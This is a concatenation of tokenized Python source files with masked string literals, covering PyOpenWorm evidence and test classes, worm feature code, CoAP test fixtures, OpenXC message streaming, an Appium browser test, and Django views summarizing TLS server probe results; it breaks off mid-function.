self . _fields : <EOL> self . _pubmed_extract ( ) <EOL> self . pmid ( self . _fields [ '<STR_LIT>' ] ) <EOL> if wbid is not None : <EOL> self . _fields [ '<STR_LIT>' ] = wbid <EOL> elif wormbase is not None : <EOL> self . _fields [ '<STR_LIT>' ] = wormbase <EOL> elif wormbaseid is not None : <EOL> self . _fields [ '<STR_LIT>' ] = wormbaseid <EOL> if '<STR_LIT>' in self . _fields : <EOL> self . _wormbase_extract ( ) <EOL> self . wbid ( self . _fields [ '<STR_LIT>' ] ) <EOL> if doi is not None : <EOL> self . _fields [ '<STR_LIT>' ] = doi <EOL> self . _crossref_doi_extract ( ) <EOL> self . 
doi ( doi ) <EOL> if bibtex is not None : <EOL> self . _fields [ '<STR_LIT>' ] = bibtex <EOL> if year is not None : <EOL> self . year ( year ) <EOL> elif date is not None : <EOL> self . year ( date ) <EOL> if title is not None : <EOL> self . title ( title ) <EOL> if author is not None : <EOL> self . author ( author ) <EOL> def add_data ( self , k , v ) : <EOL> """<STR_LIT>""" <EOL> self . _fields [ k ] = v <EOL> dp = Evidence . DatatypeProperty ( k , owner = self ) <EOL> dp ( v ) <EOL> @ property <EOL> def defined ( self ) : <EOL> if super ( Evidence , self ) . defined : <EOL> return True <EOL> else : <EOL> for x in self . id_precedence : <EOL> if getattr ( self , x ) . has_defined_value ( ) : <EOL> return True <EOL> def identifier ( self ) : <EOL> if super ( Evidence , self ) . defined : <EOL> return super ( Evidence , self ) . identifier ( ) <EOL> for idKind in self . id_precedence : <EOL> idprop = getattr ( self , idKind ) <EOL> if idprop . has_defined_value ( ) : <EOL> s = str ( idKind ) + "<STR_LIT::>" + idprop . defined_values [ <NUM_LIT:0> ] . identifier ( ) . n3 ( ) <EOL> return self . make_identifier ( s ) <EOL> def _wormbase_extract ( self ) : <EOL> wbid = self . _fields [ '<STR_LIT>' ] <EOL> def wbRequest ( ident , field ) : <EOL> return _json_request ( <EOL> "<STR_LIT>" + <EOL> wbid + <EOL> "<STR_LIT:/>" + <EOL> field ) <EOL> j = wbRequest ( wbid , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in j : <EOL> f = j [ '<STR_LIT>' ] <EOL> if '<STR_LIT:data>' in f : <EOL> self . author ( [ x [ '<STR_LIT:label>' ] for x in f [ '<STR_LIT:data>' ] ] ) <EOL> elif '<STR_LIT:name>' in f : <EOL> self . author ( f [ '<STR_LIT:name>' ] [ '<STR_LIT:data>' ] [ '<STR_LIT:label>' ] ) <EOL> j = wbRequest ( wbid , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in j : <EOL> f = j [ '<STR_LIT>' ] <EOL> if '<STR_LIT:data>' in f : <EOL> self . year ( f [ '<STR_LIT:data>' ] [ '<STR_LIT:label>' ] ) <EOL> elif '<STR_LIT:name>' in f : <EOL> self . 
year ( f [ '<STR_LIT:name>' ] [ '<STR_LIT:data>' ] [ '<STR_LIT:label>' ] ) <EOL> def _crossref_doi_extract ( self ) : <EOL> def crRequest ( doi ) : <EOL> import urllib as U <EOL> data = { '<STR_LIT:q>' : doi } <EOL> data_encoded = U . urlencode ( data ) <EOL> return _json_request ( <EOL> '<STR_LIT>' % <EOL> data_encoded ) <EOL> doi = self . _fields [ '<STR_LIT>' ] <EOL> if doi [ : <NUM_LIT:4> ] == '<STR_LIT:http>' : <EOL> doi = _doi_uri_to_doi ( doi ) <EOL> r = crRequest ( doi ) <EOL> if len ( r ) > <NUM_LIT:0> : <EOL> extra_data = r [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . split ( '<STR_LIT>' ) <EOL> fields = ( x . split ( "<STR_LIT:=>" ) for x in extra_data ) <EOL> fields = [ [ y . replace ( '<STR_LIT:+>' , '<STR_LIT:U+0020>' ) . strip ( ) for y in x ] for x in fields ] <EOL> authors = [ x [ <NUM_LIT:1> ] for x in fields if x [ <NUM_LIT:0> ] == '<STR_LIT>' ] <EOL> for a in authors : <EOL> self . author ( a ) <EOL> if len ( r ) > <NUM_LIT:0> : <EOL> r = r [ <NUM_LIT:0> ] <EOL> if '<STR_LIT:title>' in r : <EOL> self . title ( r [ '<STR_LIT:title>' ] ) <EOL> if '<STR_LIT>' in r : <EOL> self . year ( r [ '<STR_LIT>' ] ) <EOL> def _pubmed_extract ( self ) : <EOL> def pmRequest ( pmid ) : <EOL> import xml . etree . ElementTree as ET <EOL> base = '<STR_LIT>' <EOL> url = base + "<STR_LIT>" % pmid <EOL> return ET . parse ( _url_request ( url ) ) <EOL> pmid = self . _fields [ '<STR_LIT>' ] <EOL> if pmid [ : <NUM_LIT:4> ] == '<STR_LIT:http>' : <EOL> pmid = _pubmed_uri_to_pmid ( pmid ) <EOL> pmid = int ( pmid ) <EOL> tree = pmRequest ( pmid ) <EOL> for x in tree . findall ( '<STR_LIT>' ) : <EOL> self . author ( x . text ) </s>
<s> import sys <EOL> sys . path . insert ( <NUM_LIT:0> , "<STR_LIT:.>" ) <EOL> import unittest <EOL> import neuroml <EOL> import neuroml . writers as writers <EOL> import PyOpenWorm <EOL> from PyOpenWorm import * <EOL> import networkx <EOL> import rdflib <EOL> import rdflib as R <EOL> import pint as Q <EOL> import os <EOL> import subprocess as SP <EOL> import subprocess <EOL> import tempfile <EOL> import doctest <EOL> from glob import glob <EOL> from GraphDBInit import * <EOL> from DataTestTemplate import _DataTest <EOL> class ChannelTest ( _DataTest ) : <EOL> def test_DataUser ( self ) : <EOL> """<STR_LIT>""" <EOL> do = Channel ( '<STR_LIT>' , conf = self . config ) <EOL> self . assertTrue ( isinstance ( do , DataUser ) ) <EOL> def test_same_name_same_id ( self ) : <EOL> """<STR_LIT>""" <EOL> c = Channel ( name = "<STR_LIT>" ) <EOL> c1 = Channel ( name = "<STR_LIT>" ) <EOL> self . assertEqual ( c . identifier ( ) , c1 . identifier ( ) ) </s>
<s> import sys <EOL> import rdflib as R <EOL> sys . path . insert ( <NUM_LIT:0> , "<STR_LIT:.>" ) <EOL> from PyOpenWorm . worm import Worm <EOL> from PyOpenWorm . network import Network <EOL> from PyOpenWorm . muscle import Muscle <EOL> from DataTestTemplate import _DataTest <EOL> class WormTest ( _DataTest ) : <EOL> """<STR_LIT>""" <EOL> def test_get_network ( self ) : <EOL> w = Worm ( ) <EOL> w . neuron_network ( Network ( ) ) <EOL> w . save ( ) <EOL> self . assertIsInstance ( Worm ( ) . get_neuron_network ( ) , Network ) <EOL> def test_muscles1 ( self ) : <EOL> w = Worm ( ) <EOL> w . muscle ( Muscle ( name = '<STR_LIT>' ) ) <EOL> w . muscle ( Muscle ( name = '<STR_LIT>' ) ) <EOL> w . save ( ) <EOL> self . assertIn ( Muscle ( name = '<STR_LIT>' ) , list ( Worm ( ) . muscles ( ) ) ) <EOL> self . assertIn ( Muscle ( name = '<STR_LIT>' ) , list ( Worm ( ) . muscles ( ) ) ) <EOL> def test_get_semantic_net ( self ) : <EOL> g0 = Worm ( ) . get_semantic_net ( ) <EOL> self . assertTrue ( isinstance ( g0 , R . ConjunctiveGraph ) ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from . generic_features import Feature <EOL> from . . import utils <EOL> class Widths ( object ) : <EOL> """<STR_LIT>""" <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , features_ref ) : <EOL> """<STR_LIT>""" <EOL> nw = features_ref . nw <EOL> for partition in self . fields : <EOL> widths_in_partition = nw . get_partition ( partition , '<STR_LIT>' ) <EOL> setattr ( self , partition , np . mean ( widths_in_partition , <NUM_LIT:0> ) ) <EOL> @ classmethod <EOL> def from_disk ( cls , width_ref ) : <EOL> self = cls . __new__ ( cls ) <EOL> for partition in self . fields : <EOL> widths_in_partition = utils . _extract_time_from_disk ( width_ref , <EOL> partition ) <EOL> setattr ( self , partition , widths_in_partition ) <EOL> return self <EOL> def __eq__ ( self , other ) : <EOL> return ( <EOL> utils . correlation ( self . head , other . head , <EOL> '<STR_LIT>' ) and <EOL> utils . correlation ( self . midbody , other . midbody , <EOL> '<STR_LIT>' ) and <EOL> utils . correlation ( self . tail , other . tail , <EOL> '<STR_LIT>' ) ) <EOL> def __repr__ ( self ) : <EOL> return utils . print_object ( self ) <EOL> class Length ( Feature ) : <EOL> def __init__ ( self , wf , feature_name ) : <EOL> self . name = feature_name <EOL> self . value = wf . nw . length <EOL> @ classmethod <EOL> def from_schafer_file ( cls , wf , feature_name ) : <EOL> self = cls . __new__ ( cls ) <EOL> self . name = feature_name <EOL> self . value = utils . get_nested_h5_field ( wf . h , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return self <EOL> class WidthSection ( Feature ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wf , feature_name , partition_name ) : <EOL> """<STR_LIT>""" <EOL> self . name = feature_name <EOL> self . partition_name = partition_name <EOL> widths_in_partition = wf . nw . get_partition ( partition_name , '<STR_LIT>' ) <EOL> self . value = np . 
mean ( widths_in_partition , <NUM_LIT:0> ) <EOL> @ classmethod <EOL> def from_schafer_file ( cls , wf , feature_name , partition_name ) : <EOL> self = cls . __new__ ( cls ) <EOL> self . name = feature_name <EOL> self . value = utils . get_nested_h5_field ( <EOL> wf . h , [ '<STR_LIT>' , '<STR_LIT:width>' , partition_name ] ) <EOL> return self <EOL> class Area ( Feature ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wf , feature_name ) : <EOL> self . name = feature_name <EOL> self . value = wf . nw . area <EOL> @ classmethod <EOL> def from_schafer_file ( cls , wf , feature_name ) : <EOL> self = cls . __new__ ( cls ) <EOL> self . name = feature_name <EOL> self . value = utils . get_nested_h5_field ( wf . h , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return self <EOL> class AreaPerLength ( Feature ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wf , feature_name ) : <EOL> self . name = feature_name <EOL> area = self . get_feature ( wf , '<STR_LIT>' ) . value <EOL> length = self . get_feature ( wf , '<STR_LIT>' ) . value <EOL> self . value = area / length <EOL> @ classmethod <EOL> def from_schafer_file ( cls , wf , feature_name ) : <EOL> return cls ( wf , feature_name ) <EOL> class WidthPerLength ( Feature ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wf , feature_name ) : <EOL> self . name = feature_name <EOL> width = self . get_feature ( wf , '<STR_LIT>' ) . value <EOL> length = self . get_feature ( wf , '<STR_LIT>' ) . value <EOL> self . value = width / length <EOL> @ classmethod <EOL> def from_schafer_file ( cls , wf , feature_name ) : <EOL> return cls ( wf , feature_name ) </s>
<s> import os <EOL> import sys <EOL> here = sys . path [ <NUM_LIT:0> ] <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( here , '<STR_LIT:..>' ) ) <EOL> import logging <EOL> import logging . handlers <EOL> import threading <EOL> import time <EOL> import pytest <EOL> import testUtils as utils <EOL> import snoopyDispatcher as snoopyDis <EOL> from coap import coap , coapDefines as d , coapResource <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> log . addHandler ( utils . NullHandler ( ) ) <EOL> LOG_MODULES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> IPADDRESS1 = '<STR_LIT>' <EOL> IPADDRESS2 = '<STR_LIT>' <EOL> RESOURCE = '<STR_LIT>' <EOL> DUMMYVAL = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> def getTestModuleName ( request ) : <EOL> return request . module . __name__ . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> def getTestFunctionName ( request ) : <EOL> return request . function . __name__ . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> def loggingSetup ( request ) : <EOL> moduleName = getTestModuleName ( request ) <EOL> logHandler = logging . handlers . RotatingFileHandler ( <EOL> filename = '<STR_LIT>' . format ( moduleName ) , <EOL> mode = '<STR_LIT:w>' , <EOL> backupCount = <NUM_LIT:5> , <EOL> ) <EOL> logHandler . setFormatter ( <EOL> logging . Formatter ( <EOL> '<STR_LIT>' <EOL> ) <EOL> ) <EOL> for loggerName in [ moduleName ] + LOG_MODULES : <EOL> temp = logging . getLogger ( loggerName ) <EOL> temp . setLevel ( logging . DEBUG ) <EOL> temp . addHandler ( logHandler ) <EOL> log . debug ( "<STR_LIT>" ) <EOL> def loggingTeardown ( request ) : <EOL> moduleName = getTestModuleName ( request ) <EOL> output = [ ] <EOL> output += [ '<STR_LIT>' ] <EOL> for t in threading . enumerate ( ) : <EOL> output += [ '<STR_LIT>' . format ( t . 
name ) ] <EOL> output = '<STR_LIT:\n>' . join ( output ) <EOL> log . debug ( output ) <EOL> log . debug ( "<STR_LIT>" ) <EOL> for loggerName in [ moduleName ] + LOG_MODULES : <EOL> temp = logging . getLogger ( loggerName ) <EOL> temp . handler = [ ] <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def logFixtureModule ( request ) : <EOL> loggingSetup ( request ) <EOL> f = lambda : loggingTeardown ( request ) <EOL> request . addfinalizer ( f ) <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def logFixture ( logFixtureModule , request ) : <EOL> log . debug ( '<STR_LIT>' . format ( getTestFunctionName ( request ) ) ) <EOL> return logFixtureModule <EOL> def snoppyTeardown ( snoppy ) : <EOL> snoppy . close ( ) <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def snoopyDispatcher ( request ) : <EOL> moduleName = getTestModuleName ( request ) <EOL> snoopy = snoopyDis . snoopyDispatcher ( '<STR_LIT>' . format ( moduleName ) ) <EOL> f = lambda : snoppyTeardown ( snoopy ) <EOL> request . addfinalizer ( f ) <EOL> class dummyResource ( coapResource . coapResource ) : <EOL> def __init__ ( self ) : <EOL> coapResource . coapResource . __init__ ( <EOL> self , <EOL> path = RESOURCE , <EOL> ) <EOL> def GET ( self , options = [ ] ) : <EOL> log . debug ( '<STR_LIT>' ) <EOL> respCode = d . COAP_RC_2_05_CONTENT <EOL> respOptions = [ ] <EOL> respPayload = DUMMYVAL <EOL> time . sleep ( <NUM_LIT> ) <EOL> return ( respCode , respOptions , respPayload ) <EOL> def twoEndPointsTeardown ( coap1 , coap2 ) : <EOL> coap1 . close ( ) <EOL> coap2 . close ( ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> assert len ( threading . enumerate ( ) ) == <NUM_LIT:1> <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def twoEndPoints ( request ) : <EOL> coap1 = coap . coap ( ipAddress = IPADDRESS1 , testing = True ) <EOL> coap2 = coap . coap ( ipAddress = IPADDRESS2 , testing = True ) <EOL> newResource = dummyResource ( ) <EOL> coap1 . 
addResource ( newResource ) <EOL> f = lambda : twoEndPointsTeardown ( coap1 , coap2 ) <EOL> request . addfinalizer ( f ) <EOL> return ( coap1 , coap2 ) <EOL> CONFIRMABLEFIXTURE = [ <EOL> True , <EOL> False , <EOL> ] <EOL> @ pytest . fixture ( params = CONFIRMABLEFIXTURE ) <EOL> def confirmableFixture ( request ) : <EOL> return request . param </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import json <EOL> from openxc . formats . base import VehicleMessageStreamer <EOL> class JsonStreamer ( VehicleMessageStreamer ) : <EOL> SERIALIZED_COMMAND_TERMINATOR = b"<STR_LIT:\x00>" <EOL> def parse_next_message ( self ) : <EOL> parsed_message = None <EOL> remainder = self . message_buffer <EOL> message = "<STR_LIT>" <EOL> if self . SERIALIZED_COMMAND_TERMINATOR in self . message_buffer : <EOL> message , _ , remainder = self . message_buffer . partition ( <EOL> self . SERIALIZED_COMMAND_TERMINATOR ) <EOL> try : <EOL> parsed_message = JsonFormatter . deserialize ( message ) <EOL> if not isinstance ( parsed_message , dict ) : <EOL> raise ValueError ( ) <EOL> except ValueError : <EOL> pass <EOL> self . message_buffer = remainder <EOL> return parsed_message <EOL> def serialize_for_stream ( self , message ) : <EOL> return JsonFormatter . serialize ( <EOL> message ) + self . SERIALIZED_COMMAND_TERMINATOR <EOL> class JsonFormatter ( object ) : <EOL> @ classmethod <EOL> def deserialize ( cls , message ) : <EOL> return json . loads ( message . decode ( "<STR_LIT:utf8>" ) ) <EOL> @ classmethod <EOL> def serialize ( cls , data ) : <EOL> return json . dumps ( data ) . encode ( "<STR_LIT:utf8>" ) <EOL> @ classmethod <EOL> def _validate ( cls , message ) : <EOL> """<STR_LIT>""" <EOL> valid = False <EOL> if ( ( '<STR_LIT:name>' in message and '<STR_LIT:value>' in message ) or <EOL> ( '<STR_LIT:id>' in message and '<STR_LIT:data>' in message ) ) : <EOL> valid = True <EOL> return valid </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import sys <EOL> import argparse <EOL> import logging <EOL> from openxc . generator . coder import CodeGenerator <EOL> from openxc . generator . message_sets import JsonMessageSet <EOL> from openxc . utils import fatal_error , load_json_from_search_path <EOL> from . common import configure_logging <EOL> LOG = logging . getLogger ( __name__ ) <EOL> DEFAULT_SEARCH_PATH = "<STR_LIT:.>" <EOL> def parse_options ( ) : <EOL> parser = argparse . ArgumentParser ( description = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> group = parser . add_mutually_exclusive_group ( required = True ) <EOL> group . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> type = str , <EOL> nargs = '<STR_LIT:+>' , <EOL> dest = "<STR_LIT>" , <EOL> metavar = "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> group . add_argument ( "<STR_LIT>" , <EOL> type = str , <EOL> dest = "<STR_LIT>" , <EOL> metavar = "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> type = str , <EOL> nargs = '<STR_LIT:+>' , <EOL> dest = "<STR_LIT>" , <EOL> metavar = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> return parser . parse_args ( ) <EOL> def main ( ) : <EOL> configure_logging ( ) <EOL> arguments = parse_options ( ) <EOL> search_paths = arguments . search_paths or [ ] <EOL> search_paths . insert ( <NUM_LIT:0> , DEFAULT_SEARCH_PATH ) <EOL> message_sets = arguments . message_sets or [ ] <EOL> if arguments . super_set is not None : <EOL> super_set_data = load_json_from_search_path ( arguments . super_set , <EOL> arguments . search_paths ) <EOL> super_set_message_sets = super_set_data . get ( '<STR_LIT>' , [ ] ) <EOL> if len ( super_set_message_sets ) == <NUM_LIT:0> : <EOL> LOG . warning ( "<STR_LIT>" % <EOL> super_set_data . get ( '<STR_LIT:name>' , '<STR_LIT>' ) ) <EOL> message_sets . 
extend ( super_set_message_sets ) <EOL> generator = CodeGenerator ( search_paths ) <EOL> for filename in message_sets : <EOL> message_set = JsonMessageSet . parse ( filename , search_paths = search_paths , <EOL> skip_disabled_mappings = True ) <EOL> if not message_set . validate_messages ( ) or not message_set . validate_name ( ) : <EOL> fatal_error ( "<STR_LIT>" ) <EOL> generator . message_sets . append ( message_set ) <EOL> print ( generator . build_source ( ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( ) ) </s>
<s> from . data_calc import DataCalc <EOL> class GearCalc ( DataCalc ) : <EOL> def __init__ ( self ) : <EOL> self . initialize_data ( ) <EOL> def initialize_data ( self ) : <EOL> self . gears = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . data = self . gears [ <NUM_LIT:0> ] <EOL> self . name = '<STR_LIT>' <EOL> def iterate ( self , snapshot ) : <EOL> gear = snapshot [ '<STR_LIT>' ] <EOL> self . data = self . gears [ gear ] </s>
<s> import time <EOL> from appium_helper import OperaAppiumDriver <EOL> from selenium . webdriver . common . by import By <EOL> from selenium . webdriver . support . ui import WebDriverWait <EOL> from selenium . webdriver . support import expected_conditions as ExpectedConditions <EOL> desired_caps = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> driver = OperaAppiumDriver ( '<STR_LIT>' , desired_caps ) <EOL> driver . skip_introduction_guide ( ) <EOL> driver . open_page_in_native_context ( "<STR_LIT>" ) <EOL> driver . switch_to . context ( '<STR_LIT>' ) <EOL> driver . get ( "<STR_LIT>" ) <EOL> text_input = WebDriverWait ( driver , <NUM_LIT:10> ) . until ( ExpectedConditions . element_to_be_clickable ( ( By . NAME , "<STR_LIT:q>" ) ) ) <EOL> text_input . send_keys ( '<STR_LIT>' ) <EOL> driver . switch_to . context ( '<STR_LIT>' ) <EOL> driver . close_native_dialog ( ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> driver . quit ( ) </s>
<s> from django . db import models <EOL> import probedb . probedata2 . models as ProbeData <EOL> import probedb . resultdb2 . models as Results <EOL> class UpdateBatchStatus ( models . Model ) : <EOL> batchname = models . CharField ( max_length = <NUM_LIT:100> , unique = True ) <EOL> enabled = models . BooleanField ( ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" . format ( unicode ( self . batchname ) , ( "<STR_LIT>" if self . enabled else "<STR_LIT>" ) ) <EOL> @ classmethod <EOL> def IsActive ( cls , batchname = "<STR_LIT>" ) : <EOL> return bool ( cls . objects . get ( batchname = batchname ) . enabled ) </s>
<s> from django import forms <EOL> import django <EOL> import os <EOL> from django . shortcuts import get_object_or_404 , render_to_response <EOL> import probedb . resultdb2 . models as Results <EOL> import probedb . probedata2 . models as ProbeData <EOL> from django . db import connection <EOL> from django . db . models import Q <EOL> from django . http import HttpResponse <EOL> result_summaries_info = { <EOL> "<STR_LIT>" : Results . ResultSummaryList . objects . all ( ) , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : <NUM_LIT:100> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> def result_summary_info ( request , object_id ) : <EOL> """<STR_LIT>""" <EOL> object = get_object_or_404 ( Results . ResultSummaryList , pk = object_id ) <EOL> protocolfields = { } <EOL> for ( fieldname , text , cond ) in [ ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_VERSION_INTOLERANT ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_EXTENSION_INTOLERANT ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_VERANDEXT_INTOLERANT ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_VEROREXT_INTOLERANT ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_BADVERSION ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_NOVERSION ) , <EOL> ] : <EOL> cond_item = object . conditions . 
get ( condition = cond ) <EOL> for ( ver ) in [ ( <NUM_LIT:3> , <NUM_LIT:0> ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) , ( <NUM_LIT:3> , <NUM_LIT:2> ) , ( <NUM_LIT:3> , <NUM_LIT:3> ) , ( <NUM_LIT:3> , <NUM_LIT:4> ) , ( <NUM_LIT:3> , <NUM_LIT:11> ) , ( <NUM_LIT:4> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:3> ) , ( <NUM_LIT:0> , <NUM_LIT:4> ) ] : <EOL> if ver == ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> title = "<STR_LIT>" <EOL> elif ver [ <NUM_LIT:0> ] == <NUM_LIT:0> : <EOL> title = "<STR_LIT>" % ( ver [ <NUM_LIT:1> ] - <NUM_LIT:2> , ) <EOL> else : <EOL> title = "<STR_LIT>" % ( ver [ <NUM_LIT:0> ] - <NUM_LIT:2> , ( ver [ <NUM_LIT:1> ] - <NUM_LIT:1> if ver [ <NUM_LIT:0> ] == <NUM_LIT:3> else ver [ <NUM_LIT:1> ] ) ) <EOL> Q = cond_item . resultentryprotocol_set . filter ( version_tested_major = ver [ <NUM_LIT:0> ] , version_tested_minor = ver [ <NUM_LIT:1> ] ) <EOL> protocolfields . setdefault ( str ( ver ) , { "<STR_LIT:title>" : title , "<STR_LIT>" : { } } ) [ "<STR_LIT>" ] [ fieldname ] = { "<STR_LIT>" : text , "<STR_LIT:count>" : Q . count ( ) } <EOL> summary_fields = [ ] <EOL> for ( fieldname , text , cond ) in [ ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_RENEGO ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_RENEGONONCOMPLIANT ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_NONRENEGO ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , Results . ResultCondition . RESULTC_RENEGOUNSTABLE ) , <EOL> ] : <EOL> cond_item = object . conditions . get ( condition = cond ) <EOL> Q = cond_item . resultentry_set . all ( ) <EOL> summary_fields . append ( { "<STR_LIT>" : text , "<STR_LIT:count>" : Q . count ( ) } ) <EOL> return render_to_response ( "<STR_LIT>" , { <EOL> "<STR_LIT:object>" : object , <EOL> "<STR_LIT>" : protocolfields , <EOL> "<STR_LIT>" : summary_fields , <EOL> "<STR_LIT>" : [ x for x in connection . queries ] , <EOL> } ) <EOL> class ResultForm ( forms . 
Form ) : <EOL> """<STR_LIT>""" <EOL> run_to_use = forms . ModelChoiceField ( queryset = Results . ResultSummaryList . objects . order_by ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> protocol = forms . MultipleChoiceField ( required = False , choices = ( ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) + ProbeData . Server . PROTOCOL_LIST ) ) <EOL> conditions = forms . MultipleChoiceField ( required = False , choices = Results . ResultCondition . RESULTC_VALUES , widget = forms . SelectMultiple ( attrs = { "<STR_LIT:size>" : "<STR_LIT>" } ) ) <EOL> alexagroup = forms . ChoiceField ( required = False , choices = Results . ResultSummaryList . ALEXA_TYPE_VALUES ) <EOL> summary = forms . ChoiceField ( choices = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) + Results . ResultSummaryList . RESULT_TYPE_VALUES ) <EOL> run_to_limit = forms . ModelMultipleChoiceField ( required = False , <EOL> queryset = Results . ResultSummaryList . objects . order_by ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> widget = forms . SelectMultiple ( attrs = { "<STR_LIT:size>" : "<STR_LIT>" } ) ) <EOL> ciphers = [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] <EOL> for x in ProbeData . CipherName . objects . filter ( ciphername__startswith = "<STR_LIT>" ) . order_by ( "<STR_LIT>" ) : <EOL> ciphers . append ( ( x . ciphervalue , x . ciphername ) ) <EOL> ciphers_include = forms . MultipleChoiceField ( required = False , <EOL> choices = ciphers ) <EOL> ciphers_exclude = forms . MultipleChoiceField ( required = False , <EOL> choices = ciphers ) <EOL> def SearchResults_doSearch ( request ) : <EOL> """<STR_LIT>""" <EOL> if request . method == '<STR_LIT:POST>' : <EOL> form = ResultForm ( request . POST ) <EOL> elif request . method == '<STR_LIT:GET>' : <EOL> form = ResultForm ( request . GET ) <EOL> if form . is_valid ( ) : <EOL> filter = { } <EOL> summaries = { } <EOL> summary = form . cleaned_data [ "<STR_LIT>" ] <EOL> filters = form . 
cleaned_data [ "<STR_LIT>" ] <EOL> summary_entry = form . cleaned_data [ "<STR_LIT>" ] <EOL> protocol = form . cleaned_data [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in protocol or not protocol : <EOL> protocol = None <EOL> ciphers = [ ] <EOL> ciph = form . cleaned_data [ "<STR_LIT>" ] <EOL> if ciph : <EOL> for x in ciph : <EOL> if x in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> ciphers += ProbeData . CipherName . objects . filter ( ciphername__startswith = "<STR_LIT>" , ciphername__contains = "<STR_LIT:_>" + x + "<STR_LIT:_>" ) . values_list ( "<STR_LIT:id>" , flat = True ) <EOL> else : <EOL> ciphers += ProbeData . CipherName . objects . filter ( ciphervalue = int ( x ) ) . values_list ( "<STR_LIT:id>" , flat = True ) <EOL> ciphers = ProbeData . CipherName . objects . filter ( id__in = ciphers ) <EOL> ciphers_ex = [ ] <EOL> ciph = form . cleaned_data [ "<STR_LIT>" ] <EOL> if ciph : <EOL> for x in ciph : <EOL> if x in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> ciphers_ex += ProbeData . CipherName . objects . filter ( ciphername__startswith = "<STR_LIT>" , ciphername__contains = "<STR_LIT:_>" + x + "<STR_LIT:_>" ) . values_list ( "<STR_LIT:id>" , flat = True ) <EOL> else : <EOL> ciphers_ex += ProbeData . CipherName . objects . filter ( ciphervalue = int ( x ) ) . values_list ( "<STR_LIT:id>" , flat = True ) <EOL> ciphers_ex = ProbeData . CipherName . objects . filter ( id__in = ciphers_ex ) <EOL> alexagroup = form . cleaned_data [ "<STR_LIT>" ] <EOL> if not alexagroup : <EOL> alexagroup = - <NUM_LIT:1> <EOL> profile_q = None <EOL> profile = int ( request . GET . get ( "<STR_LIT>" , <NUM_LIT:0> ) ) <EOL> if profile : <EOL> 